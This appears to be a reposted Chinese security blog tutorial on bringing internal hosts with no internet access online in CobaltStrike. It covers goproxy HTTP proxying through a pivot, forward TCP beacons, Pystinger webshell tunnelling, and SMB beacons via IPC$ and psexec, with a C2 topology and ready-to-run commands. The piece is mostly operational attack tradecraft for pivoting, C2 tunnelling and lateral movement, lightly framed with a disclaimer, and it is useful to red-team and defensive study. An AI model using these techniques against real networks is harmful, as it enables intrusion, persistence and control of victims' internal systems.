内网不出网机器上线CobaltStrike

新闻资讯   2023-06-07 15:05   114   0  


场景提出

已渗透至内网,获取到DMZ区出网机器CS权限发现内网不出网(此时又分为两种情况:1、内网和DMZ区互通;2、DMZ可通内网但内网不通DMZ),根据以上叙述可以简单搭建测试环境。


给出简单拓扑:

C2服务器:123.56.108.135

跳板机(双网卡):192.168.163.129 ; 10.10.10.128

目标机器:10.10.10.129

Goproxy上线CS

本种方式适用于目标机器和DMZ互通的情况下,具体思路如下:

跳板机开启http代理供目标机器使用,CobaltStrike新建一个监听器设置HTTP Proxy为跳板机代理地址,CobaltStrike生成stagerless木马上传到目标机器,如不可直接上传可使用跳板机搭配certutil.exe或者命令执行写webshell等方式进行中转上传,目标机器执行木马即可上线。


最终上线路径:

10.10.10.129---->10.10.10.128:18080---->123.56.108.135

操作步骤

  1. 上传goproxy到跳板机,开启http代理

proxy.exe http -t tcp -p "0.0.0.0:18080" --daemon

  1. CobaltStrike新建监听器,设置HTTP Proxy为http://10.10.10.128:18080

  1. 生成stageless的木马,监听器选择刚生成的goproxy

  1. 目标机器执行木马,可上线CS

正向木马上线CS

此方法适用于DMZ能通内网但内网不通DMZ的状况即无法反弹会话的情况,遇到这种场景就要使用正向连接的木马来解决,在目标主机开启一个木马端口然后通过跳板机来连接。


操作步骤

  1. CobaltStrike创建一个beacon_tcp监听器

  1. CS生成一个stageless木马,监听器选再Forword

  1. 运行生成的木马,并在10.10.10.128 beacon中执行connect x.x.x.x 18888即可建立子beacon上线CS。

connect 10.10.10.129 18888

Pystinger上线CS

毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况

操作步骤

  1. 下载pytinger,选择适当的代理脚本上传到目标服务器,直接访问出现UTF-8即为成功。

项目地址:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

  1. 将stinger_server.exe上传到目标服务器并开启服务端等待客户端连接。

start start stinger_server.exe 0.0.0.0

  1. vps客户端连接服务端

./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

  1. CobaltStrike新建监听器,HTTP Host设置为目标机器IP,端口默认为60020

  1. 生成一个stage木马,监听器选择新建的pystinger即可上线CS

SMB Beacon

使用CobaltStrike进行内网端口扫描时发现一台机器445端口开放且攻击者有此台机器Administrator密码但是这台机器不能正常出网的情况下可使用Beacon SMB获取到Beacon Shell。

操作步骤

  1. CobaltStrike新建SMB Listener

  1. 建立IPC$空连接,并测试

beacon> shell net use \\10.10.10.136\admin$ /user:"administrator" "xxxxxxx"
beacon> shell dir \\10.10.10.136\c$

  1. 使用Psexec获取SMB Beacon Shell

jump psexec 10.10.10.136 SMB

参考

goproxy项目地址:https://github.com/snail007/goproxy/releases

pystinger项目地址:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

不出网机器上线方法:https://xz.aliyun.com/t/8671#toc-5







星球内容

正式运营星球:

1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。




























关于文章/Tools获取方式:请关注交流群或者知识星球。











关于交流群:因为某些原因,更改一下交流群的获取方式:

1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。  







关于知识星球的获取方式:

1.后台回复发送 "知识星球",即可获取知识星球二维码。

2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。








免责声明


        


本公众号文章以技术分享学习为目的。

由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。

一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!





文章引用微信公众号"极梦C",如有侵权,请联系管理员删除!

博客评论
还没有人评论,赶紧抢个沙发~
发表评论
说明:请文明发言,共建和谐网络,您的个人信息不会被公开显示。